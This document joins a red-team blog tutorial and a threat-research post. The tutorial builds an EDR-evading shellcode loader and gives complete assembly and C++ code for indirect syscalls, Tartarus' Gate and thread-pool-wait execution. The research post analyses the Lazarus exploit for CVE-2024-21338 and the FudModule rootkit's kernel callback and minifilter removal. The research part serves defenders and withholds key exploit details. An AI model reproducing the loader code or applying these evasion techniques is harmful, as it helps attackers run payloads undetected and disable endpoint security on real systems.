The task at hand is to create a loader with as few IOCs as possible and decide on the method of the injection. Most EDRs are more lenient for injections that happen in the same process, which is what the loader is going to do. For simplicity’s sake this loader will not focus on AMSI/ETW evasion – it will avoid using unhooking and use Tartarus’ Gate instead, in addition to the indirect syscall evasion. In summary, the loader will use:

  • Tartarus’ Gate
  • Indirect Syscall
  • A new injection method (kind of…)

As previously mentioned, Tartarus’ Gate will be used exactly in the same way but the stub needs to be changed accordingly for the indirect syscall, like below.

.data
    id DWORD 000h
    jmptofake QWORD 00000000h

.code 

    setup PROC
        mov id, 000h
        mov id, ecx
        mov jmptofake, 00000000h
        mov jmptofake, rdx
        ret
    setup ENDP

    executioner PROC
        mov r10, rcx
        mov eax, id
        jmp jmptofake
        ret
    executioner ENDP
end

Initially the loader needs to obtain a syscall instruction memory address in the NTDLL, which is easy enough by trying to resolve a syscall like NtAddBootEntry at + 0x18 offset, where the syscall instruction is located.

By obtaining the above, resolving and calling the NTAPI function is performed as follows.

//Resolving ZwAllocateVirtualMemory
GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
setup(SyscallId, spoofJump);
NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);

The GetSyscallId function will perform the Tartarus’ Gate checks to find the syscall ID, and then the setup function in the assembly will set the legitimate syscall instruction address and the ID in memory, so the syscall stub (aka executioner function) will execute the ZwAllocateVirtualMemory via the legitimate syscall instruction in the NTDLL.

The loader will perform ZwAllocateVirtualMemory to allocate the shellcode into memory with RW permissions, CopyMemoryEx which is a custom memcpy to write the shellcode in the allocated memory, and NtProtectVirtualMemory to change the permissions of the allocated page to RX.

The last part is the injection method that will use the functions TpAllocWait, TpSetWait and NtWaitForSingleObject.

This injection is based on CreateThreadPoolWait callback. It starts by using CreateEvent to create an event object in a signalled state, then uses TpAllocWait to create a wait object with the shellcode allocated address as the callback argument. The TpSetWait function will call the wait object’s callback function after the created event will be signaled or times out to execute the shellcode.

int main()
{
    auto hNtdll = GetModuleHandleA("ntdll.dll");
    DWORD SyscallId = 0;
    LPVOID spoofJump = ((char*)GetProcAddress(hNtdll, "NtAddBootEntry")) + 18; //Fetching the Syscall instruction address
    HANDLE c = CreateEventA(NULL, FALSE, TRUE, NULL);

    LPVOID currentVmBase = NULL;
    SIZE_T szWmResv = sizeof(buf);
    //Resolving ZwAllocateVirtualMemory
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
    setup(SyscallId, spoofJump);
    NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);
    //Allocating space in memory for shellcode

    CopyMemoryEx(currentVmBase, buf, szWmResv);
    //Avoiding hooks with custom copying on current process

    //Resolving NtProtectVirtualMemory
    DWORD oldProt;
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtProtectVirtualMemory");
    setup(SyscallId, spoofJump);
    status = executioner((HANDLE)-1,&currentVmBase, &szWmResv,PAGE_EXECUTE_READ,&oldProt);

    //Resolving TpAllocWait
    HANDLE hThread = NULL;
    pTpAllocWait TpAllocWait = (pTpAllocWait)GetProcAddress(hNtdll, "TpAllocWait");
    status = TpAllocWait((TP_WAIT**)&hThread, (PTP_WAIT_CALLBACK)currentVmBase, NULL, NULL);

    //Resolving TpSetWait
    pTpSetWait TpSetWait = (pTpSetWait)GetProcAddress(hNtdll, "TpSetWait");
    TpSetWait((TP_WAIT*)hThread, c, NULL);

    //Resolving NtWaitForSingleObject
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtWaitForSingleObject");
    setup(SyscallId, spoofJump);
    status = executioner(c, 0, NULL);
}

Obviously, the above code generates an EXE which is not recommended to be used, but it can be easily turned to DLL or to a different execution vector. The full project has been published below.

github GitHub: https://github.com/nettitude/Tartarus-TpAllocInject

There is one more IOC in this execution method – since this in memory it will look like it executes an unbacked address (address that does not point to a file on disk), which is suspicious. Working around this will be left as an exercise to the reader.

The post Creating an OPSEC safe loader for Red Team Operations appeared first on LRQA Nettitude Labs.

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day

28 February 2024 at 13:14

Key Points

  • Avast discovered an in-the-wild admin-to-kernel exploit for a previously unknown zero-day vulnerability in the appid.sys AppLocker driver. 
  • Thanks to Avast’s prompt report, Microsoft addressed this vulnerability as CVE-2024-21338 in the February Patch Tuesday update. 
  • The exploitation activity was orchestrated by the notorious Lazarus Group, with the end goal of establishing a kernel read/write primitive. 
  • This primitive enabled Lazarus to perform direct kernel object manipulation in an updated version of their data-only FudModule rootkit, a previous version of which was analyzed by ESET and AhnLab
  • After completely reverse engineering this updated rootkit variant, Avast identified substantial advancements in terms of both functionality and stealth, with four new – and three updated – rootkit techniques. 
  • In a key advancement, the rootkit now employs a new handle table entry manipulation technique in an attempt to suspend PPL (Protected Process Light) protected processes associated with Microsoft Defender, CrowdStrike Falcon, and HitmanPro. 
  • Another significant step up is exploiting the zero-day vulnerability, where Lazarus previously utilized much noisier BYOVD (Bring Your Own Vulnerable Driver) techniques to cross the admin-to-kernel boundary. 
  • Avast’s investigation also recovered large parts of the infection chain leading up to the deployment of the rootkit, resulting in the discovery of a new RAT (Remote Access Trojan) attributed to Lazarus. 
  • Technical details concerning the RAT and the initial infection vector will be published in a follow-up blog post, scheduled for release along with our Black Hat Asia 2024 briefing

Introduction 

When it comes to Windows security, there is a thin line between admin and kernel. Microsoft’s security servicing criteria have long asserted that “[a]dministrator-to-kernel is not a security boundary”, meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel. This isn’t just a theoretical concern. In practice, attackers with admin privileges frequently achieve kernel-level access by exploiting known vulnerable drivers, in a technique called BYOVD (Bring Your Own Vulnerable Driver). 

Microsoft hasn’t given up on securing the admin-to-kernel boundary though. Quite the opposite, it has made a great deal of progress in making this boundary harder to cross. Defense-in-depth protections, such as DSE (Driver Signature Enforcement) or HVCI (Hypervisor-Protected Code Integrity), have made it increasingly difficult for attackers to execute custom code in the kernel, forcing most to resort to data-only attacks (where they achieve their malicious objectives solely by reading and writing kernel memory). Other defenses, such as driver blocklisting, are pushing attackers to move to exploiting less-known vulnerable drivers, resulting in an increase in attack complexity. Although these defenses haven’t yet reached the point where we can officially call admin-to-kernel a security boundary (BYOVD attacks are still feasible, so calling it one would just mislead users into a false sense of security), they clearly represent steps in the right direction. 

From the attacker’s perspective, crossing from admin to kernel opens a whole new realm of possibilities. With kernel-level access, an attacker might disrupt security software, conceal indicators of infection (including files, network activity, processes, etc.), disable kernel-mode telemetry, turn off mitigations, and more. Additionally, as the security of PPL (Protected Process Light) relies on the admin-to-kernel boundary, our hypothetical attacker also gains the ability to tamper with protected processes or add protection to an arbitrary process. This can be especially powerful if lsass is protected with RunAsPPL as bypassing PPL could enable the attacker to dump otherwise unreachable credentials.  

For more specific examples of what an attacker might want to achieve with kernel-level access, keep reading this blog – in the latter half, we will dive into all the techniques implemented in the FudModule rootkit. 

Living Off the Land: Vulnerable Drivers Edition 

With a seemingly growing number of attackers seeking to abuse some of the previously mentioned kernel capabilities, defenders have no choice but to hunt heavily for driver exploits. Consequently, attackers wishing to target well-defended networks must also step up their game if they wish to avoid detection. We can broadly break down admin-to-kernel driver exploits into three categories, each representing a trade-off between attack difficulty and stealth. 

N-Day BYOVD Exploits 

In the simplest case, an attacker can leverage BYOVD to exploit a publicly known n-day vulnerability. This is very easy to pull off, as there are plenty of public proof-of-concept exploits for various vulnerabilities. However, it’s also relatively straightforward to detect since the attacker must first drop a known vulnerable driver to the file system and then load it into the kernel, resulting in two great detection opportunities. What’s more, some systems may have Microsoft’s vulnerable driver blocklist enabled, which would block some of the most common vulnerable drivers from loading. Previous versions of the FudModule rootkit could be placed in this category, initially exploiting a known vulnerability in dbutil_2_3.sys and then moving on to targeting ene.sys in later versions. 

Zero-Day BYOVD Exploits 

In more sophisticated scenarios, an attacker would use BYOVD to exploit a zero-day vulnerability within a signed third-party driver. Naturally, this requires the attacker to first discover such a zero-day vulnerability, which might initially seem like a daunting task. However, note that any exploitable vulnerability in any signed driver will do, and there is unfortunately no shortage of low-quality third-party drivers. Therefore, the difficulty level of discovering such a vulnerability might not be as high as it would initially seem. It might suffice to scan a collection of drivers for known vulnerability patterns, as demonstrated by Carbon Black researchers who recently used bulk static analysis to uncover 34 unique vulnerabilities across more than 200 signed drivers. Such zero-day BYOVD attacks are notably stealthier than n-day attacks since defenders can no longer rely on hashes of known vulnerable drivers for detection. However, some detection opportunities still remain, as loading a random driver represents a suspicious event that might warrant deeper investigation. For an example of an attack belonging to this category, consider the spyware vendor Candiru, which we caught exploiting a zero-day vulnerability in hw.sys for the final privilege escalation stage of their browser exploit chain. 

Beyond BYOVD 

Finally, the holy grail of admin-to-kernel is going beyond BYOVD by exploiting a zero-day in a driver that’s known to be already installed on the target machine. To make the attack as universal as possible, the most obvious target here would be a built-in Windows driver that’s already a part of the operating system.  

Discovering an exploitable vulnerability in such a driver is significantly more challenging than in the previous BYOVD scenarios for two reasons. First, the number of possible target drivers is vastly smaller, resulting in a much-reduced attack surface. Second, the code quality of built-in drivers is arguably higher than that of random third-party drivers, making vulnerabilities much more difficult to find. It’s also worth noting that – while patching tends to be ineffective at stopping BYOVD attacks (even if a vendor patches their driver, the attacker can still abuse the older, unpatched version of the driver) – patching a built-in driver will make the vulnerability no longer usable for this kind of zero-day attacks. 

If an attacker, despite all of these hurdles, manages to exploit a zero-day vulnerability in a built-in driver, they will be rewarded with a level of stealth that cannot be matched by standard BYOVD exploitation. By exploiting such a vulnerability, the attacker is in a sense living off the land with no need to bring, drop, or load any custom drivers, making it possible for a kernel attack to be truly fileless. This not only evades most detection mechanisms but also enables the attack on systems where driver allowlisting is in place (which might seem a bit ironic, given that CVE-2024-21338 concerns an AppLocker driver).  

While we can only speculate on Lazarus’ motivation for choosing this third approach for crossing the admin-to-kernel boundary, we believe that stealth was their primary motivation. Given their level of notoriety, they would have to swap vulnerabilities any time someone burned their currently used BYOVD technique. Perhaps they also reasoned that, by going beyond BYOVD, they could minimize the need for swapping by staying undetected for longer. 

CVE-2024-21338 

As far as zero-days go, CVE-2024-21338 is relatively straightforward to both understand and exploit. The vulnerability resides within the IOCTL (Input and Output Control) dispatcher in appid.sys, which is the central driver behind AppLocker, the application whitelisting technology built into Windows. The vulnerable control code 0x22A018 is designed to compute a smart hash of an executable image file. This IOCTL offers some flexibility by allowing the caller to specify how the driver should query and read the hashed file. The problem is, this flexibility is achieved by expecting two kernel function pointers referenced from the IOCTL’s input buffer: one containing a callback pointer to query the hashed file’s size and the other a callback pointer to read the data to be hashed.  

Since user mode would typically not be handling kernel function pointers, this design suggests the IOCTL may have been initially designed to be invoked from the kernel. Indeed, while we did not find any legitimate user-mode callers, the IOCTL does get invoked by other AppLocker drivers. For instance, there is a ZwDeviceIoControlFile call in applockerfltr.sys, passing SmpQueryFile and SmpReadFile for the callback pointers. Aside from that, appid.sys itself also uses this functionality, passing AipQueryFileHandle and AipReadFileHandle (which are basically just wrappers over ZwQueryInformationFile and ZwReadFile, respectively). 

Despite this design, the vulnerable IOCTL remained accessible from user space, meaning that a user-space attacker could abuse it to essentially trick the kernel into calling an arbitrary pointer. What’s more, the attacker also partially controlled the data referenced by the first argument passed to the invoked callback function. This presented an ideal exploitation scenario, allowing the attacker to call an arbitrary kernel function with a high degree of control over the first argument. 

A WinDbg session with the triggered vulnerability, traced to the arbitrary callback invocation. Note that the attacker controls both the function pointer to be called (0xdeadbeefdeadbeef in this session) and the data pointed to by the first argument (0xbaadf00dbaadf00d). 

If exploitation sounds trivial, note that there are some constraints on what pointers this vulnerability allows an attacker to call. Of course, in the presence of SMEP (Supervisor Mode Execution Prevention), the attacker cannot just supply a user-mode shellcode pointer. What’s more, the callback invocation is an indirect call that may be safeguarded by kCFG (Kernel Control Flow Guard), requiring that the supplied kernel pointers represent valid kCFG call targets. In practice, this does not prevent exploitation, as the attacker can just find some kCFG-compliant gadget function that would turn this into another primitive, such as a (limited) read/write. There are also a few other constraints on the IOCTL input buffer that must be solved in order to reach the vulnerable callback invocation. However, these too are relatively straightforward to satisfy, as the attacker only needs to fake some kernel objects and supply the right values so that the IOCTL handler passes all the necessary checks while at the same time not crashing the kernel. 

The vulnerable IOCTL is exposed through a device object named \Device\AppId. Breaking down the 0x22A018 control code and extracting the RequiredAccess field reveals that a handle with write access is required to call it. Inspecting the device’s ACL (Access Control List; see the screenshot below), there are entries for local service, administrators, and appidsvc. While the entry for administrators does not grant write access, the entry for local service does. Therefore, to describe CVE-2024-21338 more accurately, we should label it local service-to-kernel rather than admin-to-kernel. It’s also noteworthy that appid.sys might create two additional device objects, namely \Device\AppidEDPPlugin and \Device\SrpDevice. Although these come with more permissive ACLs, the vulnerable IOCTL handler is unreachable through them, rendering them irrelevant for exploitation purposes. 

Access control entries of \Device\AppId, revealing that while local service is allowed write access, administrators are not. 

As the local service account has reduced privileges compared to administrators, this also gives the vulnerability a somewhat higher impact than standard admin-to-kernel. This might be the reason Microsoft characterized the CVE as Privileges Required: Low, taking into account that local service processes do not always necessarily have to run at higher integrity levels. However, for the purposes of this blog, we still chose to refer to CVE-2024-21338 mainly as an admin-to-kernel vulnerability because we find it better reflects how it was used in the wild – Lazarus was already running with elevated privileges and then impersonated the local service account just prior to calling the IOCTL. 

The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions. As for the later versions, the vulnerability extended all the way up to the most recent builds, including Win11 23H2. There have been some slight changes to the IOCTL, including an extra argument expected in the input buffer, but nothing that would prevent exploitation.  

We developed a custom PoC (Proof of Concept) exploit and submitted it in August 2023 as part of a vulnerability report to Microsoft, leading to an advisory for CVE-2024-21338 in the February Patch Tuesday update. The update addressed the vulnerability by adding an ExGetPreviousMode check to the IOCTL handler (see the patch below). This aims to prevent user-mode initiated IOCTLs from triggering the arbitrary callbacks. 

The patched IOCTL handler. If feature 2959575357 is enabled, attempts to call the IOCTL with PreviousMode==UserMode should immediately result in STATUS_INVALID_DEVICE_REQUEST, failing to even reach AipSmartHashImageFile

Though the vulnerability may only barely meet Microsoft’s security servicing criteria, we believe patching was the right choice and would like to thank Microsoft for eventually addressing this issue. Patching will undoubtedly disrupt Lazarus’ offensive operations, forcing them to either find a new admin-to-kernel zero-day or revert to using BYOVD techniques. While discovering an admin-to-kernel zero-day may not be as challenging as discovering a zero-day in a more attractive attack surface (such as standard user-to-kernel, or even sandbox-to-kernel), we believe that finding one would still require Lazarus to invest significant resources, potentially diverting their focus from attacking some other unfortunate targets. 

Exploitation 

The Lazarus exploit begins with an initialization stage, which performs a one-time setup for both the exploit and the rootkit (both have been compiled into the same module). This initialization starts by dynamically resolving all necessary Windows API functions, followed by a low-effort anti-debug check on PEB.BeingDebugged. Then, the exploit inspects the build number to see if it’s running on a supported Windows version. If so, it loads hardcoded constants tailored to the current build. Interestingly, the choice of constants sometimes comes down to the update build revision (UBR), showcasing a high degree of dedication towards ensuring that the code runs cleanly across a wide range of target machines.  

A decompiled code snippet, loading version-specific hardcoded constants. This particular example contains offsets and syscall numbers for Win10 1809. 

The initialization process then continues with leaking the base addresses of three kernel modules: ntoskrnl, netio, and fltmgr. This is achieved by calling NtQuerySystemInformation using the SystemModuleInformation class. The KTHREAD address of the currently executing thread is also leaked in a similar fashion, by duplicating the current thread pseudohandle and then finding the corresponding kernel object address using the SystemExtendedHandleInformation system information class. Finally, the exploit manually loads the ntoskrnl image into the user address space, only to scan for relative virtual addresses (RVAs) of some functions of interest. 

Since the appid.sys driver does not have to be already loaded on the target machine, the exploit may first have to load it itself. It chooses to accomplish this in an indirect way, by writing an event to one specific AppLocker-related ETW (Event Tracing for Windows) provider. Once appid.sys is loaded, the exploit impersonates the local service account using a direct syscall to NtSetInformationThread with the ThreadImpersonationToken thread information class. By impersonating local service, it can now obtain a read/write handle to \Device\AppId. With this handle, the exploit finally prepares the IOCTL input buffer and triggers the vulnerability using the NtDeviceIoControlFile syscall.  

Direct syscalls are heavily used throughout the exploit. 

The exploit crafts the IOCTL input buffer in such a way that the vulnerable callback is essentially a gadget that performs a 64-bit copy from the IOCTL input buffer to an arbitrary target address. This address was chosen to corrupt the PreviousMode of the current thread. By ensuring the corresponding source byte in the IOCTL input buffer is zero, the copy will clear the PreviousMode field, effectively resulting in its value being interpreted as KernelMode. Targeting PreviousMode like this is a widely popular exploitation technique, as corrupting this one byte in the KTHREAD structure bypasses kernel-mode checks inside syscalls such as NtReadVirtualMemory or NtWriteVirtualMemory, allowing a user-mode attacker to read and write arbitrary kernel memory. Note that while this technique was mitigated on some Windows Insider Builds, this mitigation has yet to reach general availability at the time of writing. 

Interestingly, the exploit may attempt to trigger the vulnerable IOCTL twice. This is due to an extra argument that was added in Win11 22H2. As a result, the IOCTL handler on newer builds expects the input buffer to be 0x20 bytes in size while, previously, the expected size was only 0x18. Rather than selecting the proper input buffer size for the current build, the exploit just tries calling the IOCTL twice: first with an input buffer size 0x18 then – if not successful – with 0x20. This is a valid approach since the IOCTL handler’s first action is to check the input buffer size, and if it doesn’t match the expected size, it would just immediately return STATUS_INVALID_PARAMETER.  

To check if it was successful, the exploit employs the NtWriteVirtualMemory syscall, attempting to read the current thread’s PreviousMode (Lazarus avoids using NtReadVirtualMemory, more on this later). If the exploit succeeded, the syscall should return STATUS_SUCCESS, and the leaked PreviousMode byte should equal 0 (meaning KernelMode). Otherwise, the syscall should return an error status code, as it should be impossible to read kernel memory without a corrupted PreviousMode.  

In our exploit analysis, we deliberately chose to omit some key details, such as the choice of the callback gadget function. This decision was made to strike the right balance between helping defenders with detection but not making exploitation too widely accessible. For those requiring more information for defensive purposes, we may be able to share additional details on a case-by-case basis. 

The FudModule Rootkit

The entire goal of the admin-to-kernel exploit was to corrupt the current thread’s PreviousMode. This allows for a powerful kernel read/write primitive, where the affected user-mode thread can read and write arbitrary kernel memory using the Nt(Read|Write)VirtualMemory syscalls. Armed with this primitive, the FudModule rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt various kernel security mechanisms. It’s worth reiterating that FudModule is a data-only rootkit, meaning it executes entirely from user space and all the kernel tampering is performed through the read/write primitive.  

The first variants of the FudModule rootkit were independently discovered by AhnLab and ESET research teams, with both publishing detailed analyses in September 2022. The rootkit was named after the FudModule.dll string used as the name in its export table. While this artifact is not present anymore, there is no doubt that what we found is an updated version of the same rootkit. AhnLab’s report documented a sample from early 2022, which incorporated seven data-only rootkit techniques and was enabled through a BYOVD exploit for ene.sys. ESET’s report examined a slightly earlier variant from late 2021, also featuring seven rootkit techniques but exploiting a different BYOVD vulnerability in dbutil_2_3.sys. In contrast, our discovery concerns a sample featuring nine rootkit techniques and exploiting a previously unknown admin-to-kernel vulnerability. Out of these nine techniques, four are new, three are improved, and two remain unchanged from the previous variants. This leaves two of the original seven techniques, which have been deprecated and are no longer present in the latest variant. 

Each rootkit technique is assigned a bit, ranging from 0x1 to 0x200 (the 0x20 bit is left unused in the current variant). FudModule executes the techniques sequentially, in an ascending order of the assigned bits. The bits are used to report on the success of the individual techniques. During execution, FudModule will construct an integer value (named bitfield_techniques in the decompilation below), where only the bits corresponding to successfully executed techniques will be set. This integer is ultimately written to a file named tem1245.tmp, reporting on the rootkit’s success. Interestingly, we did not find this filename referenced in any other Lazarus sample, suggesting the dropped file is only inspected through hands-on-keyboard activity, presumably through a RAT (Remote Access Trojan) command. This supports our beliefs that FudModule is only loosely integrated into the rest of Lazarus’ malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances. 

The rootkit’s “main” function, executing the individual rootkit techniques. Note the missing 0x20 technique. 

Based on the large number of updates, it seems that FudModule remains under active development. The latest variant appears more robust, avoiding some potentially problematic practices from the earlier variants. Since some techniques target undocumented kernel internals in a way that we have not previously encountered, we believe that Lazarus must be conducting their own kernel research. Further, though the rootkit is certainly technically sophisticated, we still identified a few bugs here and there. These may either limit the rootkit’s intended functionality or even cause kernel bug checks under the right conditions. While we find some of these bugs very interesting and would love to share the details, we do not enjoy the idea of providing free bug reports to threat actors, so we will hold onto them for now and potentially share some information later if the bugs get fixed. 

Interestingly, FudModule utilizes the NtWriteVirtualMemory syscall for both reading and writing kernel memory, eliminating the need to call NtReadVirtualMemory. This leverages the property that, when limited to a single virtual address space, NtReadVirtualMemory and NtWriteVirtualMemory are basically inverse operations with respect to the values of the source Buffer and the destination BaseAddress arguments. In other words, writing to kernel memory can be thought of as writing from a user-mode Buffer to a kernel-mode BaseAddress, while reading from kernel memory could be conversely achieved by swapping arguments, that is writing from a kernel-mode Buffer to a user-mode BaseAddress. Lazarus’ implementation takes advantage of this, which seems to be an intentional design decision since most developers would likely prefer the more straightforward way of using NtReadVirtualMemory for reading kernel memory and NtWriteVirtualMemory for writing kernel memory. We can only guess why Lazarus chose this approach, but this might be yet another stealth-enhancing feature. With their implementation, they only must use one suspicious syscall instead of two, potentially reducing the number detection opportunities. 

Debug Prints 

Before we delve into the actual rootkit techniques, there is one last thing worth discussing. To our initial surprise, Lazarus left a handful of plaintext debug prints in the compiled code. Such prints are typically one of the best things that can happen to a malware researcher, because they tend to accelerate the reverse engineering process significantly. In this instance, however, some of the prints had the opposite effect, sometimes even making us question if we understood the code correctly.  

As an example, let us mention the string get rop function addresses failed. Assuming rop stands for return-oriented programming, this string would make perfect sense in the context of exploitation, if not for the fact that not a single return address was corrupted in the exploit.  

Plaintext debug strings found in the rootkit. The term vaccine is used to refer to security software. 

While written in English, the debug strings suggest their authors are not native speakers, occasionally even pointing to their supposed Korean origin. This is best seen on the frequent usage of the term vaccine throughout the rootkit. This had us scratching our heads at first, because it was unclear how vaccines would relate to the rootkit functionality. However, it soon became apparent that the term was used to refer to security software. This might originate from a common Korean translation of antivirus (바이러스 백신), a compound word with the literal meaning virus vaccine. Note that even North Korea’s “own” antivirus was called SiliVaccine, and to the best of our knowledge, the term vaccine would not be used like this in other languages such as Japanese. Additionally, this is not the first time Korean-speaking threat actors have used this term. For instance, AhnLab’s recent report on Kimsuky mentions the following telltale command: 
 
cmd.exe /U /c wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt

Another puzzle is the abbreviation pvmode, which we believe refers to PreviousMode. A Google search for pvmode yields exactly zero relevant results, and we suspect most English speakers would choose different abbreviations, such as prvmode or prevmode. However, after consulting this with language experts, we learned that using the abbreviation pvmode would be unusual for Korean speakers too. 

Finally, there is also the debug message disableV3Protection passed. Judging from the context, the rather generic term V3 here refers to AhnLab V3 Endpoint Security. Considering the geopolitical situation, North Korean hacker groups are likely well-acquainted with South Korean AhnLab, so it would make perfect sense that they internally refer to them using such a non-specific shorthand. 

0x01 – Registry Callbacks 

The first rootkit technique is designed to address registry callbacks. This is a documented Windows mechanism which allows security solutions to monitor registry operations. A security solution’s kernel-mode component can call the CmRegisterCallbackEx routine to register a callback, which gets notified whenever a registry operation is performed on the system. What’s more, since the callback is invoked synchronously, before (or after) the actual operation is performed, the callback can even block or modify forbidden/malicious operations. FudModule’s goal here is to remove existing registry callbacks and thus disrupt security solutions that rely on this mechanism. 

The callback removal itself is performed by directly modifying some internal data structures managed by the kernel. This was also the case in the previous version, as documented by ESET and AhnLab. There, the rootkit found the address of nt!CallbackListHead (which contains a doubly linked, circular list of all existing registry callbacks) and simply emptied it by pointing it to itself. 

In the current version of FudModule, this technique was improved to leave some selected callbacks behind, perhaps making the rootkit stealthier. This updated version starts the same as the previous one: by finding the address of nt!CallbackListHead. This is done by resolving CmUnRegisterCallback (this resolution is performed by name, through iterating over the export table of ntoskrnl in memory), scanning its function body for the lea rcx,[nt!CallbackListHead] instruction, and then calculating the final address from the offset extracted from the instruction’s opcodes. 

With the nt!CallbackListHead address, FudModule can iterate over the registry callback linked list. It inspects each entry and determines if the callback routine is implemented in ntoskrnl.exe, applockerfltr.sys, or bfs.sys. If it is, the callback is left untouched. Otherwise, the rootkit replaces the callback routine pointer with a pointer to ObIsKernelHandle and then proceeds to unlink the callback entry. 

0x02 – Object Callbacks 

Object callbacks allow drivers to execute custom code in response to thread, process, and desktop handle operations. They are often used in self-defense, as they represent a convenient way to protect critical processes from being tampered with. Since the protection is enforced at the kernel level, this should protect even against elevated attackers, as long as they stay in user mode. Alternatively, object callbacks are also useful for monitoring and detecting suspicious activity.  

Whatever the use case, object callbacks can be set up using the ObRegisterCallbacks routine. FudModule naturally attempts to do the exact opposite: that is to remove all registered object callbacks. This could let it bypass self-defense mechanisms and evade object callback-based detection/telemetry. 

The implementation of this rootkit technique has stayed the same since the previous version, so there is no need to go into too much detail. First, the rootkit scans the body of the ObGetObjectType routine to obtain the address of nt!ObTypeIndexTable. This contains an array of pointers to _OBJECT_TYPE structures, each of which represents a distinct object type, such as Process, Token, or SymbolicLink. FudModule iterates over this array (skipping the first two special-meaning elements) and inspects each _OBJECT_TYPE.CallbackList, which contains a doubly linked list of object callbacks registered for the particular object type. The rootkit then empties the CallbackList by making each node’s forward and backward pointer point to itself. 

0x04 – Process, Thread, and Image Kernel Callbacks 

This next rootkit technique is designed to disable three more types of kernel callbacks: process, thread, and image callbacks. As their names suggest, these are used to execute custom kernel code whenever a new process is created, a new thread spawned, or a new image loaded (e.g. a DLL loaded into a process). These callbacks are extremely useful for detecting malicious activity. For instance, process callbacks allow AVs and EDRs to perform various checks on each new process that is to be created. Registering these callbacks is very straightforward. All that is needed is to pass the new callback routine as an argument to PsSetCreateProcessNotifyRoutine, PsSetCreateThreadNotifyRoutine, or PsSetLoadImageNotifyRoutine. These routines also come in their updated Ex variants, or even Ex2 in the case of PsSetCreateProcessNotifyRoutineEx2

Process, thread, and image callbacks are managed by the kernel in an almost identical way, which allows FudModule to use essentially the same code to disable all three of them. We find that this code has not changed much since the previous version, with the main difference being new additions to the list of drivers whose callbacks are left untouched.  

FudModule first finds the addresses of nt!PspNotifyEnableMask, nt!PspLoadImageNotifyRoutine, nt!PspCreateThreadNotifyRoutine, and nt!PspCreateProcessNotifyRoutine. These are once again obtained by scanning the code of exported routines, with the exact scanning method subject to some variation based on the Windows build number. Before any modification is performed, the rootkit clears nt!PspNotifyEnableMask and sleeps for a brief amount of time. This mask contains a bit field of currently enabled callback types, so clearing it disables all callbacks. While some EDR bypasses would stop here, FudModule’s goal is not to disable all callbacks indiscriminately, so the modification of nt!PspNotifyEnableMask is only temporary, and FudModule eventually restores it back to its original value. We believe the idea behind this temporary modification is to decrease the chance of a race condition that could potentially result in a bug check. 

All three of the above nt!Psp(LoadImage|CreateThread|CreateProcess)NotifyRoutine globals are organized as an array of _EX_FAST_REF pointers to _EX_CALLBACK_ROUTINE_BLOCK structures (at least that’s the name used in ReactOS, Microsoft does not share a symbol name here). FudModule iterates over all these structures and checks if _EX_CALLBACK_ROUTINE_BLOCK.Function (the actual callback routine pointer) is implemented in one of the below-whitelisted modules. If it is, the pointer will get appended to a new array that will be used to replace the original one. This effectively removes all callbacks except for those implemented in one of the below-listed modules. 

ntoskrnl.exe ahcache.sys mmcss.sys cng.sys 
ksecdd.sys tcpip.sys iorate.sys ci.dll 
dxgkrnl.sys peauth.sys wtd.sys
Kernel modules that are allowed during the removal of process, thread, and image callbacks. 

0x08 – Minifilter Drivers 

File system minifilters provide a mechanism for drivers to intercept file system operations. They are used in a wide range of scenarios, including encryption, compression, replication, monitoring, antivirus scanning, or file system virtualization. For instance, an encryption minifilter would encrypt the data before it is written to the storage device and, conversely, decrypt the data after it is read. FudModule is trying to get rid of all the monitoring and antivirus minifilters while leaving the rest untouched (after all, some minifilters are crucial to keep the system running). The choice about which minifilters to keep and which to remove is based mainly on the minifilter’s altitude, an integer value that is used to decide the processing order in case there are multiple minifilters attached to the same operation. Microsoft defines altitude ranges that should be followed by well-behaved minifilters. Unfortunately, these ranges also represent a very convenient way for FudModule to distinguish anti-malware minifilters from the rest. 

In its previous version, FudModule disabled minifilters by directly patching their filter functions’ prologues. This would be considered very unusual today, with HVCI (Hypervisor-Protected Code Integrity) becoming more prevalent, even turned on by default on Windows 11. Since HVCI is a security feature designed to prevent the execution of arbitrary code in the kernel, it would stand in the way of FudModule trying to patch the filter function. This forced Lazarus to completely reimplement this rootkit technique, so the current version of FudModule disables file system minifilters in a brand-new data-only attack. 

This attack starts by resolving FltEnumerateFilters and using it to find FltGlobals.FrameList.rList. This is a linked list of FLTMGR!_FLTP_FRAME structures, each representing a single filter manager frame. From here, FudModule follows another linked list at _FLTP_FRAME.AttachedVolumes.rList. This linked list consists of FLTMGR!_FLT_VOLUME structures, describing minifilters attached to a particular file system volume. Interestingly, the rootkit performs a sanity check to make sure that the pool tag associated with the _FLT_VOLUME allocation is equal to FMvo. With the sanity check satisfied, FudModule iterates over _FLT_VOLUME.Callbacks.OperationsLists, which is an array of linked lists of FLTMGR!_CALLBACK_NODE structures, indexed by IRP major function codes. For instance, OperationsLists[IRP_MJ_READ] is a linked list describing all filters attached to the read operation on a particular volume. 

FudModule making sure the pool tag of a _FLT_VOLUME chunk is equal to FMvo

For each _CALLBACK_NODE, FudModule obtains the corresponding FLTMGR!_FLT_INSTANCE and FLTMGR!_FLT_FILTER structures and uses them to decide whether to unlink the callback node. The first check is based on the name of the driver behind the filter. If it is hmpalert.sys (associated with the HitmanPro anti-malware solution), the callback will get immediately unlinked. Conversely, the callback is preserved if the driver’s name matches an entry in the following list: 

bindflt.sys storqosflt.sys wcifs.sys cldflt.sys 
